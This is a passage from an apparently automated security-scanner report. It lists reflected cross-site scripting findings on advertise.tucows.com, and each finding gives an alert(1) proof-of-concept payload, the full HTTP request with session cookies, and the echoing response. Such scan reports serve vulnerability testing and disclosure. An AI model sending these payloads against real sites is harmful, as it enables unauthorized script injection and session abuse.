The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd486"-alert(1)-"0da40994d37 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/js/x_core.jscd486"-alert(1)-"0da40994d37 HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:36 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 33252

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes/js/x_core.jscd486"-alert(1)-"0da40994d37";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.25. http://advertise.tucows.com/includes/js/xdocsize.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/js/xdocsize.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1fa22"-alert(1)-"0e7110e52dc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes1fa22"-alert(1)-"0e7110e52dc/js/xdocsize.js HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:17 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32569

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes1fa22"-alert(1)-"0e7110e52dc/js/xdocsize.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.26. http://advertise.tucows.com/includes/js/xdocsize.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/js/xdocsize.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c95d"-alert(1)-"1272630c525 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/js9c95d"-alert(1)-"1272630c525/xdocsize.js HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:23 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32362

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes/js9c95d"-alert(1)-"1272630c525/xdocsize.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.27. http://advertise.tucows.com/includes/js/xdocsize.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/js/xdocsize.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f090"-alert(1)-"a04c13647f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/js/xdocsize.js9f090"-alert(1)-"a04c13647f HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:36 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32156

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes/js/xdocsize.js9f090"-alert(1)-"a04c13647f";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.28. http://advertise.tucows.com/includes/js/yetii.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/js/yetii.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b8a6f"-alert(1)-"48e3c448543 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includesb8a6f"-alert(1)-"48e3c448543/js/yetii.js HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:20 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32548

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includesb8a6f"-alert(1)-"48e3c448543/js/yetii.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.29. http://advertise.tucows.com/includes/js/yetii.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/js/yetii.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 505a4"-alert(1)-"da5a49629e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/js505a4"-alert(1)-"da5a49629e/yetii.js HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:26 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 31925

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes/js505a4"-alert(1)-"da5a49629e/yetii.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.30. http://advertise.tucows.com/includes/js/yetii.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/js/yetii.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ad87"-alert(1)-"ee3d1dab97f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/js/yetii.js5ad87"-alert(1)-"ee3d1dab97f HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:38 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes/js/yetii.js5ad87"-alert(1)-"ee3d1dab97f";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.31. http://advertise.tucows.com/includes/themes/03BlueMeany/style.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/themes/03BlueMeany/style.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f637"-alert(1)-"80f9081ac8c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes5f637"-alert(1)-"80f9081ac8c/themes/03BlueMeany/style.css HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:29 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32153

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes5f637"-alert(1)-"80f9081ac8c/themes/03BlueMeany/style.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.32. http://advertise.tucows.com/includes/themes/03BlueMeany/style.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/themes/03BlueMeany/style.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49de9"-alert(1)-"04a15e87fd3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/themes49de9"-alert(1)-"04a15e87fd3/03BlueMeany/style.css HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:45 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 31930

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes/themes49de9"-alert(1)-"04a15e87fd3/03BlueMeany/style.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.33. http://advertise.tucows.com/includes/themes/03BlueMeany/style.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/themes/03BlueMeany/style.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3a9a"-alert(1)-"237aaaa614c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/themes/03BlueMeanyc3a9a"-alert(1)-"237aaaa614c/style.css HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
